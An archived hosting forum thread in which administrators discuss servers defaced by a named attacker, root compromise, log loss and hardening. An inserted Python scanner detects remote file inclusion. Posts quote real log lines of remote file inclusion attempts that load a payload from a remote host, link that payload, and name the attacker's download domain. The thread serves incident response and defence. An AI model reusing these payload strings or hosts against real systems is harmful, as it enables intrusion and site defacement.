Server hacked by iskorpitx



__co__
03-21-2007, 01:53 AM
Hello,

Yesterday morning, my server was hacked by the well known Turkish hacker. As far as I can see using Google, he only defaces websites by replacing the index with a page with a Turkish flag and a picture of Ataturk. This is what he has done to me anyway. Several websites have this page and he also replaced the DA interface after you log in.

The problem is, I can't restart any of the services now, most exit with vague errors. But, probably this is due to the fact that the complete /var/log directory is deleted. I haven't got a backup of these files and/or directory structure.

I have 2 questions.

1) Can anyone help me with the complete directory structure of the /var/log directory along with all permissions as they are default for a DA machine.
2) Where are the DA interface pages located ?

The most important question is of course, how did he get in; nobody knows this according to Google.

__co__
03-21-2007, 08:31 AM
Anybody ?

All I need is a complete directory and file listing of the /var/log dir ..

nobaloney
03-21-2007, 12:01 PM
Which OS Distribution?

However when a hacker breaks in and deletes your logs, he's obviously got root access, so a rebuild from bare-metal is the best idea.

Jeff

__co__
03-22-2007, 12:21 AM
Thanks Jeff, I gave it a fresh clean install.

pucky
03-22-2007, 11:47 AM
Hello,

Yesterday morning, my server was hacked by the well known Turkish hacker. As far as I can see using Google, he only defaces websites by replacing the index with a page with a Turkish flag and a picture of Ataturk. This is what he has done to me anyway. Several websites have this page and he also replaced the DA interface after you log in.

The problem is, I can't restart any of the services now, most exit with vague errors. But, probably this is due to the fact that the complete /var/log directory is deleted. I haven't got a backup of these files and/or directory structure.

I have 2 questions.

1) Can anyone help me with the complete directory structure of the /var/log directory along with all permissions as they are default for a DA machine.
2) Where are the DA interface pages located ?

The most important question is of course, how did he get in; nobody knows this according to Google.

Yes, we have been getting hack attempts in our logs. This guy is from Hong Kong although it's probably just a trojaned box. He is trying to install a file called M.txt into /tmp, then I suspect he would try to execute it. But, this is only possible if you have no security on your box or you have not had your server locked down properly, because if you did he would not be able to deface your websites.

Here are the relevant logs from his attempts:



Request: 12.196.192.16 - - [20/Mar/2007:12:43:37 -0400] "GET /gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0

GET /gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1

Request: 12.196.192.16 - - [20/Mar/2007:12:43:37 -0400] "GET /forum/components/com_performs/performs.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0

Request: 12.196.192.16 - - [20/Mar/2007:12:43:58 -0400] "GET /calendar/ws/login.php?includedir=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0

and so on


Notice that he tried various attempts to install M.txt without success?

You can load his URL to see what he's trying to do:

http://203.198.68.236/~lisir/M.txt
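A defender-side check for the pattern in those log lines, added here as an example and not part of pucky's post: it parses Apache-style access log entries (constructed samples in the same layout as the excerpt above, reusing the addresses quoted in the thread plus one benign request) and flags any query parameter whose value is a remote URL, which is the signature of a remote file inclusion attempt against parameters like mosConfig_absolute_path, and records whether the server refused the request (403, as in the thread) or served it.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the layout of the thread's excerpt; the first two lines
# reuse the addresses quoted there, the third is a benign request for contrast.
SAMPLE_LOG = """\
Request: 12.196.192.16 - - [20/Mar/2007:12:43:37 -0400] "GET /gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0
Request: 12.196.192.16 - - [20/Mar/2007:12:43:58 -0400] "GET /calendar/ws/login.php?includedir=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0
Request: 10.0.0.5 - - [20/Mar/2007:12:44:10 -0400] "GET /forum/index.php?topic=12&page=2 HTTP/1.1" 200 5120
"""

# Apache common-log prefix, allowing the "Request: " tag the excerpt carries.
LOG_RE = re.compile(
    r'^(?:Request: )?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def parse_line(line):
    """Split one access-log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_params(target):
    """Query parameters of a request target whose value is a remote URL."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value)]

def scan_log(text):
    """Flag remote file inclusion attempts and whether the server served them."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, url in remote_params(rec["target"]):
            status = int(rec["status"])
            findings.append({
                "ip": rec["ip"],
                "path": urlsplit(rec["target"]).path,
                "param": name,
                "include_host": urlsplit(url).hostname,
                "status": status,
                # 4xx/5xx (as in the thread) means refused; a 2xx on an RFI
                # attempt is the case that warrants incident response.
                "served": status < 400,
            })
    return findings
```

Run scan_log over a real access log and treat any finding with "served" set to True as a host that needs the full analysis Jeff describes rather than a cleanup of index files.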

pucky
03-22-2007, 11:53 AM
Which OS Distribution?

However when a hacker breaks in and deletes your logs, he's obviously got root access, so a rebuild from bare-metal is the best idea.

Jeff


Defacement of website does not mean root access. The box needs to be analysed to see if it was actually rooted or if the websites were simply defaced. We have cleaned tons of boxes where all the sites were defaced but no root was gained.

nobaloney
03-22-2007, 09:41 PM
Defacement of website does not mean root access. The box needs to be analysed to see if it was actually rooted or if the websites were simply defaced. We have cleaned tons of boxes where all the sites were defaced but no root was gained.
Read again, pucky. If he deleted the entire /var/log path, he got root access.

Jeff

pucky
03-23-2007, 12:43 AM
I need to read slower, I think.

anonno
05-03-2007, 04:40 PM
I have been hacked by the same hacker last night. He changed all the index files on my server. I managed to change the index files for my websites. I also changed my root password through SSH. But I can't log into DirectAdmin now. If I type my username and password, the hacker's page shows up. What should I do now?

Thanks

pucky
05-03-2007, 09:15 PM
Get a full restore, have your DC mount the primary as the secondary then retrieve the data.

Jhost82
04-08-2008, 01:50 PM
We also have a defacement problem. What are your software versions?

apache =
php =
kernel =

Do you have any idea how they do this defacement?

na2thai
05-12-2008, 12:48 PM
Is there any way to recover the log files?

nobaloney
05-12-2008, 07:58 PM
Possibly, if you dismount the drive from the system as soon as you discover the problem, and then either know how to find and rebuild data on the partition type your drive uses, or you hire someone who does.

If you've left the drive in the system even a few hours chances are that much of the important data has been overwritten.

Jeff

naiton
05-13-2008, 07:43 PM
Hi Jeff,
How can you guarantee the server will not be hacked again? Because after reinstall it still has the same bug.
Thank you.

floyd
05-14-2008, 05:28 AM
How can you guarantee the server will not be hacked again?

Nobody can guarantee that. And I didn't see where Jeff indicated it. Your server security is YOUR responsibility.

genexis
05-14-2008, 07:21 AM
I think it is a bug in a gallery software you are using. I had that problem in the past with photopost. However, if you mount your /tmp directory with noexec, I believe the hacker will not be able to run his program.

floyd
05-14-2008, 07:30 AM
However, if you mount your /tmp directory with noexec, I believe the hacker will not be able to run his program.


Depending on what program it is, he may still be able to run it. If it's a Perl program, for instance, he can run it by prepending perl to it, e.g. perl /tmp/script.pl or /usr/bin/perl /tmp/script.pl

So mounting /tmp with noexec will help, but it's not total protection.

genexis
05-14-2008, 09:47 AM
I don't think you will be able to execute any Perl scripts with Apache unless they are in the cgi-bin dir.

floyd
05-14-2008, 09:56 AM
I don't think you will be able to execute any Perl scripts with Apache unless they are in the cgi-bin dir.

Keep thinking that and you will be hacked. There are plenty of PHP exploits that allow an attacker to upload a Perl script to either /tmp or /var/tmp and execute it. The Perl script will run as the user apache since it was a PHP script that executed it. This is not a theory. This is fact.

nobaloney
05-14-2008, 05:16 PM
It's unlikely you were hacked again that quickly (though of course it's possible). It's more likely that you restored a backup of the hacked site.

Jeff

dreaken667
01-11-2010, 03:28 PM
For anyone else this guy may have hit:

I found the script that was used to wreak the havoc on my server. The evidence in my case was located in /.bash_history, /etc/udev/pr.txt and /etc/udev/i.txt.

The history file shows the attacker downloaded the txt files from ddmalfa.cz and ran them. He also added a user named "help" before causing the system to crash.

aED
01-11-2010, 04:11 PM
If you are running suPHP and a hacker uploaded a Perl script, will the script run as the user or not?

__co__
01-12-2010, 12:02 AM
Very interesting.

Can you also post the method of how he got the files on the box? And the question is indeed, how can you run the script as root.